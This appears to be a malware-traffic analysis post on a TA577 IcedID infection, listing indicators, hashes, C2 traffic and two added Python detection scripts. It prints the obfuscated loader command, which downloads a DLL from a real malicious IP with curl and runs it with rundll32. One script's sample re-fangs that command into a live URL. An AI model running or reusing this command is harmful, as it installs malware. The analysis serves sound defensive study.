2023-10-16 (MONDAY) - TA577 ICEDID (BOKBOT) INFECTION

INFECTION CHAIN:

- thread-hijacked email --> link for zip download --> downloaded zip --> extracted .js file --> 
  retrieves IcedID installer --> IcedID infection with BackConnect traffic

SOME URLS FROM EMAILS FOR THE INITIAL ZIP ARCHIVE REPORTED TO URLHAUS:

- hxxps[:]//flashnewsbensedira[.]com/el/
- hxxps[:]//pakistan1[.]tv/sui/
- hxxps[:]//clautedomex[.]mx/iis/
- hxxps[:]//keramatfarm[.]net/tdei/
- hxxps[:]//agriformexico[.]com/puae/
- hxxps[:]//axioworldwide[.]com/umu/
- hxxps[:]//ptbolaterbaik[.]com/ed/
- hxxps[:]//talhaislam[.]com/saes/
- hxxps[:]//infocuankerajaan[.]co/qu/
- hxxps[:]//alpscoating[.]com/oarm/
- hxxps[:]//bombaycasuals[.]com/tmpr/
- hxxps[:]//i9fqe[.]com/E/

- Note: These are not the full URLs (the path was longer), but while active they led to the download of the initial zip archive.

EXAMPLE OF DOWNLOADED ZIP ARCHIVE AND EXTRACTED .JS FILE:

- SHA256 hash: d9fd1583c77e3bb4baabb40f8609d00fc9234747eefae82d9662e59778162a38
- File size: 86,168 bytes
- File name: vdh.zip
- File type: Zip archive data, at least v2.0 to extract, compression method=deflate
- File description: zip archive retrieved from link in a TA577 email

- SHA256 hash: fcada920fd63cd4f32710660f5ecec14ac894c919dfbfea7ed5725b679de477a
- File size: 424,446 bytes
- File name: opt-20.js
- File type: ASCII text, with very long lines (65536), with no line terminators
- File description: script file extracted from the above zip archive

COMMAND SCRIPT RUN BY THE ABOVE .JS FILE:

  "C:\Windows\System32\cmd.exe" /c ec || eCho ec &
  PING ec || cURL hxxp[:]//198.99.61[.]173/Ftn/level -o %TMP%\ec.log &
  PING -n 2 ec || ruNDlL32 %tmp%\ec.log scab /k haval462 &
  EXIT prqiAmUavMTcuG=
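The command above leans on three tricks that are easy to key on: randomized letter case in the executable names (eCho, cURL, ruNDlL32), `||` fallback chains whose left side is a bogus command (ec, PING ec) that is guaranteed to fail so the right side always runs, and a download to %TMP% with a .log extension that rundll32 then loads as a DLL. The Python below is an added example written for this page, not code from the original post: it splits a cmd.exe one-liner on its operators, normalizes each sub-command, reports those indicators, and correlates the curl output path with the module rundll32 loads. The sample input is the page's loader command (re-fanged to http://, as it would appear in process-creation telemetry), the page's persistent-DLL run method with an assumed username "alice" filling the placeholders, and a constructed benign line for contrast.

```python
import re
from typing import Dict, List, Set

# Sample command lines. "loader" is the page's installer command (re-fanged),
# "persist" is the page's run method for the persistent DLL with assumed example
# paths (username "alice" is an assumption), "benign" is constructed for contrast.
SAMPLES: Dict[str, str] = {
    "loader": (
        r'"C:\Windows\System32\cmd.exe" /c ec || eCho ec & '
        r"PING ec || cURL http://198.99.61.173/Ftn/level -o %TMP%\ec.log & "
        r"PING -n 2 ec || ruNDlL32 %tmp%\ec.log scab /k haval462 & "
        r"EXIT prqiAmUavMTcuG="
    ),
    "persist": (
        r"rundll32 C:\Users\alice\AppData\Local\ewevex\Haikvamk32.dll,init "
        r'--itma="C:\Users\alice\AppData\Roaming\PrintVehicle\license.dat"'
    ),
    "benign": (
        r'"C:\Windows\System32\cmd.exe" /c curl https://example.com/tool.zip '
        r"-o C:\Tools\tool.zip && echo done"
    ),
}

CMD_WRAPPER = re.compile(r'^\s*"?(?:[a-z]:\\[^"\s]*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+', re.I)
SEPARATORS = re.compile(r"\s*(&&|\|\||&)\s*")   # keeps the operator as a token
TEMP_VARS = re.compile(r"%(?:tmp|temp)%", re.I)
EXEC_EXTENSIONS = {"exe", "dll", "cpl", "ocx", "scr", "sys", "drv"}
DOWNLOADERS = {"curl", "certutil", "bitsadmin", "wget", "powershell"}
# Commands that legitimately sit on the left of "||" in admin scripts.
KNOWN_COMMANDS = {"echo", "ping", "curl", "rundll32", "exit", "set", "cd", "dir",
                  "copy", "move", "del", "type", "mkdir", "net", "sc", "reg",
                  "powershell", "certutil", "bitsadmin", "wget", "cmd", "start"}


def norm_path(tok: str) -> str:
    """Lower-case a path, strip quotes, fold %TMP%/%TEMP% into one token."""
    return TEMP_VARS.sub("%temp%", tok.strip('"').lower())


def exe_name(tok: str) -> str:
    """'C:\\x\\cURL.exe' -> 'curl' (basename, lower-cased, .exe dropped)."""
    base = re.split(r"[\\/]", tok.strip('"'))[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def extension(path: str) -> str:
    m = re.search(r"\.([a-z0-9]+)$", path)
    return m.group(1) if m else ""


def is_mixed_case(tok: str) -> bool:
    """True for 'cURL' or 'ruNDlL32'; False for 'curl', 'PING' or 'Rundll32'."""
    base = re.split(r"[\\/]", tok.strip('"'))[-1]
    return (any(c.isupper() for c in base) and any(c.islower() for c in base)
            and base != base.capitalize())


def analyze(cmdline: str) -> List[str]:
    """Return the sorted list of indicator names found in one command line."""
    findings: Set[str] = set()
    m = CMD_WRAPPER.match(cmdline)
    body = cmdline[m.end():] if m else cmdline
    parts = SEPARATORS.split(body)           # [cmd, op, cmd, op, ...]
    cmds, ops = parts[0::2], parts[1::2]
    downloaded: Set[str] = set()             # normalized output paths seen
    for i, cmd in enumerate(cmds):
        toks = cmd.split()
        if not toks:
            continue
        exe, args = exe_name(toks[0]), toks[1:]
        if is_mixed_case(toks[0]):
            findings.add("mixed_case_executable")
        if exe in DOWNLOADERS:
            for j, a in enumerate(args):
                if a.lower() in ("-o", "--output") and j + 1 < len(args):
                    dest = norm_path(args[j + 1])
                    downloaded.add(dest)
                    if dest.startswith("%temp%") and extension(dest) not in EXEC_EXTENSIONS:
                        findings.add("download_to_temp_nonexec_extension")
        if exe == "rundll32" and args:
            module = norm_path(args[0].split(",")[0])   # "x.dll,export" -> "x.dll"
            if extension(module) not in EXEC_EXTENSIONS:
                findings.add("rundll32_nonexec_module")
            if module.startswith("%temp%") or "\\appdata\\" in module:
                findings.add("rundll32_module_user_writable")
            if module in downloaded:
                findings.add("download_then_rundll32_same_file")
            if any(a.lower().startswith("--itma=") for a in args):
                findings.add("rundll32_itma_argument")
        # "X || Y": Y runs only if X fails, so a bogus X is just a disguise.
        if i < len(ops) and ops[i] == "||":
            target = args[-1] if args else ""
            if exe not in KNOWN_COMMANDS or (exe == "ping" and "." not in target):
                findings.add("fallback_chain_with_failing_left_side")
    return sorted(findings)


if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print(f"{name}: {analyze(line)}")
```

The correlation between the curl output path and the rundll32 module is the strongest signal here: on its own a .log file in %TMP% is noise, but a download to that path followed in the same command line by rundll32 loading it is the loader pattern shown above.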

TRAFFIC FROM AN INFECTION:

- Date/Time (UTC)      Destination IP     Port  Domain               Info
  -------------------  -----------------  ----  -------------------  ------------------------------------------------
- 2023-10-16 18:30:59  198.99.61[.]173    80    198.99.61[.]173      GET /Ftn/level  <-- returned installer DLL
- 2023-10-16 18:31:03  104.21.7[.]13      80    aptekoagraliy[.]com  GET /            <-- fake gzip binary
- 2023-10-16 18:31:04  104.248.81[.]48    443   joekairbos[.]com     Client Hello  <-- post-infection HTTPS C2 starts
- 2023-10-16 18:32:04  104.248.81[.]48    443   joekairbos[.]com     Client Hello
- 2023-10-16 18:32:05  104.248.81[.]48    443   joekairbos[.]com     Client Hello
- 2023-10-16 18:32:05  104.248.81[.]48    443   joekairbos[.]com     Client Hello
- 2023-10-16 18:32:05  104.248.81[.]48    443   joekairbos[.]com     Client Hello
- 2023-10-16 18:32:06  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 18:32:07  159.89.124[.]188   443                       <-- start of TCP traffic for IcedID BackConnect
- 2023-10-16 18:32:07  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 18:37:05  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 18:42:23  151.236.9[.]107    443   lazirusairnaf[.]com  Client Hello
- 2023-10-16 18:47:24  151.236.9[.]107    443   lazirusairnaf[.]com  Client Hello
- 2023-10-16 18:52:25  151.236.9[.]107    443   lazirusairnaf[.]com  Client Hello
- 2023-10-16 18:56:13  151.236.9[.]107    443   lazirusairnaf[.]com  Client Hello
- 2023-10-16 18:58:24  104.223.118[.]109  443   seedkraproboy[.]com  Client Hello
- 2023-10-16 18:58:26  104.223.118[.]109  443   seedkraproboy[.]com  Client Hello
- 2023-10-16 18:59:00  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 18:59:32  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 19:00:38  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 19:01:44  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 19:02:50  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 19:03:56  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 19:04:36  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 19:05:02  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 19:05:12  151.236.9[.]107    443   lazirusairnaf[.]com  Client Hello
- 2023-10-16 19:05:48  104.248.81[.]48    443   joekairbos[.]com     Client Hello
- 2023-10-16 19:06:08  104.248.81[.]48    443   joekairbos[.]com     Client Hello
- 2023-10-16 19:06:24  104.223.118[.]109  443   seedkraproboy[.]com  Client Hello
- 2023-10-16 19:11:40  104.223.118[.]109  443   seedkraproboy[.]com  Client Hello
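Two things in the table above are worth turning into detections: the post-infection HTTPS C2 domains check in at roughly fixed intervals (lazirusairnaf[.]com about every five minutes, drignyaffk[.]com about every 66 seconds during the 19:00 to 19:04 run), and the BackConnect flow is plain TCP to port 443 with no TLS Client Hello. The Python below is an added example, not part of the original page: it parses a constructed, re-fanged subset of the table, groups connections by destination, scores how regular the gaps between connections are, and flags periodic beacons, port-443 flows without a TLS handshake, and plain HTTP to a bare IP address. The "-" domain and "TCP" info on the BackConnect line are how this example represents the absence of SNI in the page's table.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed sample: a subset of the page's traffic table, re-fanged and
# reduced to "timestamp  dst_ip  port  domain  info". "-" marks no SNI/Host.
SAMPLE_LOG = """\
2023-10-16 18:30:59  198.99.61.173   80   198.99.61.173      GET /Ftn/level
2023-10-16 18:31:03  104.21.7.13     80   aptekoagraliy.com  GET /
2023-10-16 18:31:04  104.248.81.48   443  joekairbos.com     Client Hello
2023-10-16 18:32:04  104.248.81.48   443  joekairbos.com     Client Hello
2023-10-16 18:32:05  104.248.81.48   443  joekairbos.com     Client Hello
2023-10-16 18:32:07  159.89.124.188  443  -                  TCP
2023-10-16 18:42:23  151.236.9.107   443  lazirusairnaf.com  Client Hello
2023-10-16 18:47:24  151.236.9.107   443  lazirusairnaf.com  Client Hello
2023-10-16 18:52:25  151.236.9.107   443  lazirusairnaf.com  Client Hello
2023-10-16 18:56:13  151.236.9.107   443  lazirusairnaf.com  Client Hello
2023-10-16 19:00:38  91.193.18.135   443  drignyaffk.com     Client Hello
2023-10-16 19:01:44  91.193.18.135   443  drignyaffk.com     Client Hello
2023-10-16 19:02:50  91.193.18.135   443  drignyaffk.com     Client Hello
2023-10-16 19:03:56  91.193.18.135   443  drignyaffk.com     Client Hello
"""

LINE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\s+(\S+)\s+(\d+)\s+(\S+)\s+(.*)$")
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse(log: str) -> List[dict]:
    rows = []
    for line in log.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        ts, ip, port, domain, info = m.groups()
        rows.append({"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "ip": ip,
                     "port": int(port), "domain": domain, "info": info.strip()})
    return rows


def beacon_score(times: List[datetime]) -> Tuple[float, float]:
    """(median gap in seconds, fraction of gaps within 10% or 5 s of that median)."""
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if len(gaps) < 2:
        return 0.0, 0.0
    med = statistics.median(gaps)
    tol = max(0.1 * med, 5.0)
    regular = sum(1 for g in gaps if abs(g - med) <= tol)
    return med, regular / len(gaps)


def summarize(rows: List[dict]) -> Dict[str, dict]:
    """Per destination: hit count, median gap, regularity score and flags."""
    by_dst = defaultdict(list)
    for r in rows:
        by_dst[(r["ip"], r["port"], r["domain"])].append(r)
    out: Dict[str, dict] = {}
    for (ip, port, domain), hits in by_dst.items():
        hits.sort(key=lambda r: r["ts"])
        med, score = beacon_score([r["ts"] for r in hits])
        flags = []
        if port == 443 and not any("Client Hello" in r["info"] for r in hits):
            flags.append("port_443_without_tls_handshake")   # BackConnect-style raw TCP
        if port == 80 and IPV4.match(domain):
            flags.append("plain_http_to_bare_ip")            # installer retrieval
        if len(hits) >= 3 and score >= 0.5 and med >= 30:
            flags.append("periodic_beacon")                  # regular C2 check-ins
        out[domain if domain != "-" else ip] = {"count": len(hits), "median_gap_s": med,
                                                 "beacon_score": round(score, 2),
                                                 "flags": flags}
    return out


if __name__ == "__main__":
    for dst, summary in summarize(parse(SAMPLE_LOG)).items():
        print(f"{dst:20} {summary}")
```

joekairbos[.]com stays unflagged on this subset because its three connections are bunched (gaps of 60 s and 1 s), which is the point of scoring regularity rather than raw connection count: the burst at the start of an infection looks nothing like the timer-driven check-ins that follow.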

MALWARE/ARTIFACTS FROM AN INFECTION:

- SHA256 hash: 9814a8f9f29e6efb4a7896f61ced334cc5567c3aa61a66325eca76360f1226b4
- File size: 808,625 bytes
- File location: hxxp[:]//198.99.61[.]173/Ftn/level
- File location: C:\Users\[username]\AppData\Local\Temp\ec.log
- File type: PE32+ executable (DLL) (console) x86-64, for MS Windows
- File description: Retrieved and run by above .js file, this is a DLL installer for IcedID
- Run method: rundll32 [filename] scab /k haval462

- SHA256 hash: e05a450089cea22daae866154a5fcb5e043e4f9456ccb079e40c79f716c1db25
- File size: 1,143,404 bytes
- File location: hxxp[:]//aptekoagraliy[.]com/
- File type: gzip compressed data, was "Jeans.txt", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 4835498
- File description: fake gzip binary used to create persistent IcedID DLL and license.dat data binary

- SHA256 hash: 332afc80371187881ef9a6f80e5c244b44af746b20342b8722f7b56b61604953
- File size: 354,474 bytes
- File location: C:\Users\[username]\AppData\Roaming\PrintVehicle\license.dat
- File type: data
- File description: data binary needed to run persistent IcedID DLL

- SHA256 hash: b6ae99f5eea0c2df141c823f38d1ce065a0ba4dc331f219071bf480221f61d7a
- File size: 788,176 bytes
- File location: C:\Users\[username]\AppData\Local\ewevex\Haikvamk32.dll
- File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
- File description: Persistent DLL for IcedID infection
- Run method: rundll32 [filename],init --itma="[path to license.dat]"

 

IMAGES:

- Image (not reproduced in this text version): Traffic from the infection filtered in Wireshark.

 
